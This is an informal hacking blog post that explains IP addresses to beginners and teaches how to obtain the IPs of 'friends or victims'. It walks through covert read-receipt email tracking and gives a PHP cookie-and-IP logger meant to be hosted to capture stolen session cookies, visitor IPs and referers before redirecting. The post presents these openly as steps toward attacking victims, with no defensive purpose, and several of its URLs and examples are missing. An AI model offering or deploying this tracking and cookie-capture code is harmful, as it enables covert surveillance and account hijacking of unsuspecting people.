I have been getting requests that the content we are posting is not easy for beginners.I was little disappointed with such review so here we go simple yet effective post about very basic of intenet,networking the IP-address.

What is an IP address?
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted-quad') and look something like this is example of ipv4)

What can be done with an IP address?

IP adress is the very basic unit before you start a hack its basically used for fingerprinting,tracing and if victim is weak it wont take 10 secs to penetrate through vulnerability :)

HOW can I get an IP address?

Its an easy task to get your aswell as others ip addresses
to get your own ip address just go to this website

How to get ip of a website?
go to shell(command prompt) just type ping
and there it will start showing numeric just like in this picture

How to get IP address of friends or victims?

Using E-mail receipts

E-mail receipt is a kind of notification you get as an e-mail when someone open (reading the mail send by you) your mail.

This notification consist of
  • IP address of the mail reader.
  • Time and date of reading the mail.
  • Name and version of his browser.
 You need to follow these steps

a. Step 1:-

Visit readnotify and signup there. You can use your gmail, yahoo, hotmail,rediff or any email id. They give free trials for 2 weeks or 25 emails whichever comes first.

b. Step 2:-

Let's say you have used your email id to register on, than login to your email account first.

c. Step 3:-

Click on the Compose mail menu and in the To : section write the email id of the culprit followed by, so the complete email address would be like 
just the normal procedure of email

step 4
you are done just wait for the victim to open that email volla you will get the details.

Using php scripts 

here is the basic php script
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
header ("Location:")
Process:save it in you hosting ripway,my3gb,blackapplehost etc dont forget to create a file.txt file which will save all the ips 

This will save ips with date,time,from where link came+u can redirect to another url just like i redirected to google in matter of seconds.

Upcoming post will be on fingerprinting with ip address so we can work with a flow.

Do share you views on this post i tried to keep it simple.